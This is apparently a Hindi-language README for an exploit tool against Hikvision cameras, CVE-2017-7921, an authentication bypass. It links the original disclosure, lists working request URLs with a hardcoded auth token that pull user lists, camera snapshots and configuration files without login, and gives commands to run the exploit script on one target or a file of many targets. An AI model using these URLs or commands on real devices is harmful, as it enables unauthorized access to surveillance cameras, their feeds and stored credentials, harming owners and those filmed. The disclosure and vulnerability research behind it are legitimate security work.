
हिकविजन कैमरा CVE-2017-7921-EXP
Hikvision उपकरणों में एक अनुचित प्रमाणीकरण समस्या पाई गई।
अनुचित प्रमाणीकरण भेद्यता तब होती है जब कोई एप्लिकेशन उपयोगकर्ताओं को पर्याप्त या सही रूप से प्रमाणित नहीं करता है।
इससे एक दुर्भावनापूर्ण उपयोगकर्ता सिस्टम पर अपने विशेषाधिकारों को बढ़ा सकता है और संवेदनशील जानकारी तक पहुंच प्राप्त कर सकता है।
https://seclists.org/fulldisclosure/2017/Sep/23
भेद्यता विवरण:
----------------------
सभी उपयोगकर्ताओं और उनकी भूमिकाओं की सूची प्राप्त करें:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
प्रमाणीकरण के बिना कैमरा स्नैपशॉट प्राप्त करें:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
और सबसे बुरी बात, कोई भी कैमरा कॉन्फ़िगरेशन डाउनलोड कर सकता है:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
